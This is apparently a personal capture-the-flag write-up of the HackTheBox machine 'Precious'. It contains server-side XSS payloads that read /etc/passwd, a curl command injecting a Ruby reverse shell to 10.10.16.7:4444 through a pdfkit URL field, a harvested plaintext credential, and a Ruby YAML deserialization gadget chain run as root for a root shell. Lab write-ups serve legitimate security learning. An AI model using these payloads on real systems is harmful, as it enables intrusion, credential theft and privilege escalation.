Precious
Personal Rating: Medium
Enumeration
sudo nmap -sV <IP>
Only ssh and port 80 open
There is a page where you are supposed to enter an URL and get it converted to PDF
nginx and Phusion Passenger 6.0.15
Subdomain Scan, dirscan and Vhost scan revealed nothing at all
On the web page, when I fetch a html page that I created and host on my machine, I get a PDF file as output. I will try to include files with Javascript.
I created a test js file. A PDF with this content to check the injection:
<!DOCTYPE html>
<html>
<body>
<div id="main">The JS was not executed</div>
</body>
<script>
div = document.getElementById('main');
div.innerHTML = "The JS was executed";
</script>
</html>Server Side XSS?
The vulnerability is a Server Side XSS, as you can make a web handler execute code, but not in the browser of a user that accesses the website for instance, but on the server itself. I found a list of LFI payloads to test:
<!DOCTYPE html>
<html>
<body>
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
</body>
</html>I am loading this with http://10.10.16.7:8000/test.html
This seems to make the server not output a PDF anymore, so I removed it:
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>The script collection above actually returned nothing when sending it to the server.
Exifdata pdfkit Exploit Reveal
I checked the result PDF with exiftool and found out that it uses a vulnerable pdfkit version. This is not the way that I expected. I saw that it is important to test and enumerate broadly before trying for too long on an exploit path that does not work.
The version of exiftool is vulnerable to a ruby code injection. https://www.ctfiot.com/84447.html
This was the command that did the exploit:
curl 'http://precious.htb/'
-X POST
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0'
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8'
-H 'Accept-Language: en-US,en;q=0.5'
-H 'Accept-Encoding: gzip, deflate'
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'Origin: http://precious.htb/'
-H 'Connection: keep-alive'
-H 'Referer: http://precious.htb/'
-H 'Upgrade-Insecure-Requests: 1'
--data-raw 'url=http%3A%2F%2F10.10.16.7%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.7%22%2C4444%29%29%27%60'
--output soos.txtI got a shell with that actually.
With this I could upgrade it to a real tty:
python3 -c 'import pty; pty.spawn("/bin/bash")'There is the user “henry”. I cannot read the user.txt yet as I am the ruby user.
Internal Enumeration
I ran linPEASS:
- Potentially Vulnerable to CVE-2022-0847
- Potentially Vulnerable to CVE-2022-2588
- CVE-2022-0847
NOPE - sudo version?
NOPE - /etc/nginx/sites-enabled/pdfapp.conf
NOPE - /usr/share/openssh/sshd_config
NOPE- /var/log/nginx/access.log
NOPE- /var/log/nginx/error.log
- /opt/sample
- ╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-21+15:15:08.0729708500 /usr/local/sbin/laurel
2022-09-26+05:04:43.6880195170 /home/ruby/.bundle/config
2022-09-26+05:04:42.9800195060 /usr/local/bin/tilt
2022-09-26+05:04:42.8480195040 /usr/local/bin/rackup
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundler
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundle
NOPE - /tmp/passenger.YarIXDw/full_admin_password.txt
NOPE - /tmp/passenger.YarIXDw/read_only_admin_password.txt
<SNIP>I got the creds henry:Q3c1AqGHtoI0aXAYFH from /home/ruby/.bundle/config
With that I could ssh on to the host
Ruby SUID Dependency Update Exploit
With sudo -l I found an suid binary:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
After changing the PATH to include /home/henry and creating a file called dependencies.yml in it, I looked at the update deps file. It uses YAML.load(File.read... This is apparently vulnerable to a deserialization, which can lead to code execution. I had to peek at the writeup for this as I got stuck.
I put this in the dependencies.yml:
--- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::DependencyList
specs:
- !ruby/object:Gem::Source::SpecificFile
spec: &1 !ruby/object:Gem::StubSpecification
loaded_from: "/root/root.txt"
- !ruby/object:Gem::Source::SpecificFile
spec:I wanted a shell as root, so I researched further
In the end, this payload worked to get a root shell:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: /bin/bash
method_id: :resolveLast updated